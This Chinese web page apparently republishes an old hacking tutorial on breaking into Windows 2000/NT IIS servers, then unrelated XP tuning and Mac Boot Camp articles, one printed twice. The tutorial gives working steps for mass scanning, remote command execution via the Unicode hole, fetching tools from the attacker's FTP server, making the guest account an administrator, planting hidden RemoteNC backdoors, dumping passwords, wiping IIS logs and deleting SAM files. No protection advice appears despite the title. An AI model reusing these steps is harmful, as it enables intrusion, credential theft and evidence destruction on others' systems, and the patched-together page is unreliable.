系统入侵的一些方法和个人电脑防护技巧

作者:小菜 更新时间:2025-01-17 点击数:
简介:先介绍一些系统入侵的一些常用方法:先用流光(在iv FOR 2000/nt/xp的版本下)一般我都是用SQL扫描(现在的流光都有IIS/PRONTPAGE扫描了

【菜科解读】

先介绍一些系统入侵的一些常用方法:先用流光(在iv FOR 2000/nt/xp的版本下)一般我都是用SQL扫描(现在的流光都有IIS/PRONTPAGE扫描了,那就用这个),然后利用的是iis远程执行命令漏洞,这个漏洞你应该知道一般有这个漏洞就有U漏洞,但是有U漏洞不一定有这个漏洞,所以我一般都扫个2-3万台(网段)比如111.111.1.1-111.111.100.255然后就去干别的,运气再不好,也有个好多台。

然后呢?我的手法是这样的在IIS远程执行命令漏洞下(这个漏洞流光可以连接,其实就是U漏洞的各种类型,也就说你扫到U漏洞了用我以下写的手法一样非常容易入侵一台机器:),打入copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\treasure.exe(如果是U漏洞在IE上打入:..../scripts/cmd.exe?/c+copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\treasure.exe)其实在IIS远程执行命令漏洞下我们一般能用到的DOS命令(常用的)是set查看他的网站结构,dir查看上传情况(记的常用dir c:\xxx/s这个命令)(此时可以在IE上打入ip/scripts/treasure.exe?/c+set,很有成就感是吗?) 虽然很多时候用SET就能看到网站的WEB目录但是更多的时候还是要用到这个命令PATH_TRANSLATED=c:\inetpub\wwwroot这个就是SET后的结果中的一句话这个就是网站的WEB目录,那如果没这句话呢?没关系用DIR C:\XXX/S这个命令啊网站上随便找张图点右键,看到图的名字了吧呵呵替换XXX呵呵:)如果C盘下没有?呵呵试到F盘:)肯定会有的哈哈SET还可以查看到很多东东呢:)好好去实验吧,比如SCRIPTS目录,我还碰到过SCRIPTS目录是c:\progra~1\....\masca什么的呢:)这个你多实验肯定会知道的接着呢我比较喜欢在IE上做事,其实在IIS远程命令执行漏洞上利用是一样的ip/scripts/treasure.exe?/c+这里你该明白了,我们权限很小,一般只能在这里用FTP或者TFTP上传:)tftp的命令为ip/scripts/treasure.exe?/c+tftp+ip+get+idq.dll+c:\inetpub\scripts\idq.dllFTP的命令为ip/scripts/treasure.exe?/c+echo+open+free.tsee.net>bbs.txt (你的FTP站点,在DOS下用FTP命令你就明白我所写了语句了)ip/scripts/treasure.exe?/c+echo+treasure>>bbs.txt(ftp用户名)ip/scripts/treasure.exe?/c+echo+123456>>bbs.txt(ftp密码)ip/scripts/treasure.exe?/c+echo+get+idq.dll>>bbs.txt(idq.dll利用044漏洞入侵的,呵呵直接运行IDQ。

DLL亦可以得到个ADMINISTRATOR用户和密码,iisuser,密码是abcd1234.)直接运行的命令为ip/scripts/treasure.exe?/c+c:\inetpub\scripts\idq.dll(直接运行其他程序也是一样的用法,聪明的人应该现在就看出来了用的全是DOS命令)ip/scripts/treasure.exe?/c+echo+bye>>bbs.txtip/scripts/treasure.exe?/c+ftp+-s:bbs.txt(ftp命令的高级使用了吧呵呵)注意>是完全替换就是说BBS。

TXT原来是存在的用>写就用现在的语句替换了,>>是写第二行第三行,依次类推这里要注意的是bbs.txt最后一定要删除,这里留下了你的FTP站点名字和你的用户名和密码如果你下次还想用的话呵呵最好删除了(给个建议用台肉鸡开个FTP自己建立用户名和密码)那样最方便了:)用肉鸡做事然后呢就好办了ispc ip/scripts/idq.dll这里要补充的是,既然我们扫的是SQL出来的是IIS漏洞,当然能利用IDQ。

DLL了,其实有时候你扫到弱IPC密码和用户,他没开HTTP或者没用IIS那样的话呵呵,IDQ。

DLL用不上了我们只能上传些木马类的了。

这个是很好的后门,我最喜欢用这个了别忘记连接后要按三次回车算一次的。

接着一般以我的手法是激活guestnet user guest /active:yesnet user guest 123456net localgroup administrators guest /add然后呢用ipc连接传个showpass到他的system32目录下呵呵肯定用的上的net use \\ip\ipc$ "800214520" /user:"guest"copy showpass.exe \\ip\admin$\system32\showpass.exenet use \\ip\ipc$ /delete(呵呵习惯要好) 这里要说明的是有兴趣的朋友亦可以上传IRC木马和csrss.exe(简短说明: 本软件可以在Nt4.0/Win2000的系统上面添加Administrators权限账号,由于采用时间添加方式,以任务方式添加账号,在中午12点整时自动添加账号,13点时删除账号,18点时添加账号,19点时删除账号,23点时添加账号,0点删除账号,由于以上几个时间段都是网管最容易忽视的时间,网管根本不会想到你会拥有Administrators权限账号,从而使得你的劳动结果不会被破坏,:)

IRC木马不介绍的原因是太可怕,亦是我认为唯一算的上是好木马说到开后门了其实在上步的时候有兴趣的朋友可以上传ASP后门(不推荐觉的权限不够大)这里我们用的是remotencremotenc没有日志记录(爽吗?)呵呵remotenc对付administrator密码为空的时候输入""(嘿嘿)remotenc的说明呵呵详细吧 RemoteNC

[/OVERWRITE] remotenc x.x.x.x 用户 密码 (LocalSystem or RunAsUser 任选一下) 服务名 服务描述 监听端口 控制密码 [是否覆盖原有服务] 这里介绍一下我朋友说的隐藏REMOTENC的方法没用过(呵呵不是经验之谈了懒啊没办法)remotenc 192.***.***.*** Administrator 123456 localsystem Server Server 7 123456(创建remotenc后门)telnet后门后dir server.exeattriv server.exe +h +r dir server.exe呵呵用的是DOS命令(很实用啊)别人不能覆盖你的后门了(因为是只读)当然了有兴趣的可以装个Sniffer还有的是remotenc的补充说明(可以本地安装)方便吧:)可以TELNET后用SHOWPASS(这就是为什么放在system32下的原因了)SHOWPASS的实用,他本地机器用ADMINISTRATOR登陆后呵呵:)我们SHOWPASS肯定能得到ADMINISTRATOR的密码哈哈爽吗?很多时候这个密码在SQL和FTP还有PCANYWHERE里面都是通用的啊有个软件要注意dwrcc这里要说明的是这个软件不推荐,但是确实很实用(只要能建立IPC连接就能用这个了,大多数情况)主要这个是图形界面的。

但是如果你机器突然之间下面多了个图标或者有时候鼠标移动有些问题,呵呵你会怎么想? 介绍一下我关于使用SHOWPASS的经验;) 你已经会ispc提升权限,idq.dll(也可以当作后门使用),会出现提示符 c:\winnt\system32\ showpass(在这里输入一样ok,前提当然已经用copy showpass.exe \\ip\admin$\system32,传到这个目录了) 用remotenc开了后门以后telnet上去输入showpass(COPY是必须的) 成功率相当的高,前提是他那台机器本地用administrator已经登陆,好象WIN2000/NT 把管理员的密码登陆后存放在内存里了还是明文的.. 知道管理员的密码不就又是个后门了,更多的是管理员的密码==pcanywhere的密码=sql的密码哈哈哈哈 showpass的原理(meteor写的我没看懂)GetWindowText() and TextOut() window API's REMOTENC本地安装IP改成127.0.0.1还有的是REMOTENC有两种模式可以安装推荐第一种:)90%的机器都能安装成功的(呵呵没装个好的防火墙)现在的经验是不需要这个也可以IDQ.DLL亦是个好后门不会被杀还有你REMOTENC装好后就把GUEST 停用吧:)保险点呵呵别忘记删除日志(这个不是我的习惯,不要跟我学习)cleaniislog.exe . 你的ip //删除所有日至中有你的ip的纪录。

cleaniislog.exe C:\winnt\system32\logfiles\w3svc1\ex020208.log 你的ip //指定删除一个日志文件中你的ip纪录。

p.s: 不一定是w3svc1,有可能是w3svc2 ,vc3等, ex020208 为02年02月08号的日志,即当天日志。

如果不是~ 运行:cleaniislog.exe /? 看看帮助。

(这个也不是我写的)随便看看吧,我的建议是手动改日志文件目录(唉呀你没看到上面的语句啊)关于ispc和IDQ.DLL呵呵前面介绍了这里就不说了,反正就这么用(idq.dll可以改成数个名字亦可以使用)还要推荐个PIPEUPADMIN这个软件很多朋友问我有GUEST用户能上传文件该怎么办,好简单啊:)用这个软件啊上传后运行就可以了啊:)呵呵强制提升权限。

还有啊pwdump3这个软件是抓回SAM挡的:)(有用户名和密码就可以抓回了)LC3破好了42天内(不管密码多复杂没有破不了的,我讨厌暴力破解我是个没耐心的人)刚想起来了朋友问我怎么看主页很简单啊,用ip/scripts/treasure.exe?/c+type+c:\xxx\xxx.htm嘿嘿这个是查看文件的目录,你试一下效果好吗?呵呵其实一般找到WEB目录的路径我就不信找不到他的主页这里要补充的是。

其实IIS远程执行命令漏洞就是U漏洞的几个类型从A-F:(我好象也刚领悟)所以U漏洞也一样利用我写的手法,成功率非常之高。

国内很多日10万IP的网站依然有此漏洞。

为什么我很多时间不深入探讨PRINTER溢出,PRINTER溢出针对的是没打SP2的:(那没打SP2的肯定有U漏洞了。

多思考你会比别人进步的更快。

这里还要提供一个入侵的新思路如果我用U漏洞或者用FTP能访问他的目录或者其他的方法能访问他的目录并且有删除文件的功能。

试试删除了他的winnt/repair和winnt/config下的SAM文件。

(2000为SAM,NT为SAM._ )这篇好像是CRACKER入侵啊。

呵呵不管了。

呵呵写了这么长手酸了,明天再补充点吧。

今天就到这里吧。

系统,入侵,的,一些,方法,和,个人电脑,防护,先,

xp系统优化常用方法

专业的在线重装系统软件 全新设计 / 全新代码编写 / 全新支持所有机型 全新支持Window 11 安装 xp系统如何优化加快运行速度?xp系统优化如何设置?硬件配置不高的电脑想让XP系统运行的更好就需要对电脑系统进行一些优化设置,那么接下来小编教你一些xp系统优化常用方法!1、鼠标点击右键,单击属性,把主题和外观都设置成“windows经典”,并且把桌面悲剧设置为 无 。

2、点击右下角的“开始”, 然后点击“运行”,在出现的窗口中输入 msconfig 然后在启动下关闭自己觉得不必要的,然后保存并推出。

3、关闭系统还原, 右键点击桌面“我的电脑”中的“属性”,点击高级下的性能 设置,选定最佳性能,关闭一些效果。

4、右键点击桌面上的我的文档,点击属性,把默认的保存路径修改到其它地方。

5、打开IE浏览器,在IE主窗口中,依次进入工具,-internet选项-然后点击常规,在internet临时文件下点击设置,然后点击“移动文件夹”,将原本保存在C盘的修改成其他盘。

以上就是xp系统优化常用方法的全部内容,希望对你有所帮助!

Mac电脑如何安装Win7系统

想重装系统不会怎么办?菜科网一键重装系统轻松在线帮您搞定系统重装问题。

软件支持 在线重装、U盘制作、自定义重装 等多种模式。

简介:本文将介绍如何在Mac电脑上安装Windows 7系统,为用户提供了在Mac电脑上体验Windows系统的方法。

通过安装Windows 7系统,用户可以享受到Windows系统的各种功能和应用程序,提高工作和娱乐的效率。

工具原料:品牌型号:MacBook Pro操作系统版本:macOS Catalina软件版本:Boot Camp Assistant 6.1.0一、准备工作1、备份数据:在安装Windows 7系统之前,建议用户先备份Mac电脑上的重要数据,以防数据丢失。

2、下载Windows 7镜像文件:用户需要从官方网站下载Windows 7的ISO镜像文件,确保文件完整且没有被篡改。

二、使用Boot Camp Assistant安装Windows 71、打开Boot Camp Assistant:在Mac电脑上打开Boot Camp Assistant,该应用程序可以帮助用户在Mac电脑上安装Windows系统。

2、创建Windows分区:在Boot Camp Assistant中,用户可以选择创建Windows分区的大小,并将其格式化为FAT32文件系统。

3、安装Windows 7:在Boot Camp Assistant中,用户可以选择安装Windows 7系统,并按照提示进行操作,包括选择Windows 7镜像文件、设置分区大小等。

4、完成安装:安装过程可能需要一段时间,用户需要耐心等待,直到安装完成。

三、启动Windows 7系统1、重启电脑:安装完成后,用户需要重启Mac电脑。

2、选择启动磁盘:在重启过程中,按住Option键,直到出现启动磁盘选择界面。

3、选择Windows分区:在启动磁盘选择界面中,选择Windows分区,并按下回车键。

4、进入Windows 7系统:等待片刻,Mac电脑将会启动Windows 7系统。

总结:通过本文介绍的方法,用户可以在Mac电脑上安装Windows 7系统,体验Windows系统的各种功能和应用程序。

安装Windows系统可以满足用户对不同操作系统的需求,提高工作和娱乐的效率。

希望本文对用户有所帮助,让用户能够顺利安装Windows 7系统。

标签: 注意:本站所刊载的文章均为学习交流之用,请勿用于商业用途。

对于商业使用,请联系各自版权所有者,否则法律问题自行承担。

Win7系统升级指南:全面解析升级步骤与要点 Win7系统损坏修复教程:详细步骤助你快速解决问题 简介:本文将介绍如何在Mac电脑上安装Windows 7系统,为用户提供了在Mac电脑上体验Windows系统的方法。

通过安装Windows 7系统,用户可以享受到Windows系统的各种功能和应用程序,提高工作和娱乐的效率。

工具原料:品牌型号:MacBook Pro操作系统版本:macOS Catalina软件版本:Boot Camp Assistant 6.1.0一、准备工作1、备份数据:在安装Windows 7系统之前,建议用户先备份Mac电脑上的重要数据,以防数据丢失。

2、下载Windows 7镜像文件:用户需要从官方网站下载Windows 7的ISO镜像文件,确保文件完整且没有被篡改。

二、使用Boot Camp Assistant安装Windows 71、打开Boot Camp Assistant:在Mac电脑上打开Boot Camp Assistant,该应用程序可以帮助用户在Mac电脑上安装Windows系统。

2、创建Windows分区:在Boot Camp Assistant中,用户可以选择创建Windows分区的大小,并将其格式化为FAT32文件系统。

3、安装Windows 7:在Boot Camp Assistant中,用户可以选择安装Windows 7系统,并按照提示进行操作,包括选择Windows 7镜像文件、设置分区大小等。

4、完成安装:安装过程可能需要一段时间,用户需要耐心等待,直到安装完成。

三、启动Windows 7系统1、重启电脑:安装完成后,用户需要重启Mac电脑。

2、选择启动磁盘:在重启过程中,按住Option键,直到出现启动磁盘选择界面。

3、选择Windows分区:在启动磁盘选择界面中,选择Windows分区,并按下回车键。

4、进入Windows 7系统:等待片刻,Mac电脑将会启动Windows 7系统。

总结:通过本文介绍的方法,用户可以在Mac电脑上安装Windows 7系统,体验Windows系统的各种功能和应用程序。

安装Windows系统可以满足用户对不同操作系统的需求,提高工作和娱乐的效率。

希望本文对用户有所帮助,让用户能够顺利安装Windows 7系统。

菜科网系统致力于解决 Windows 系统重装解决方案,提供高效、安全、免费的系统重装服务。

加入收藏
               

系统入侵的一些方法和个人电脑防护技巧

点击下载文档

格式为doc格式

  • 账号登录
社交账号登录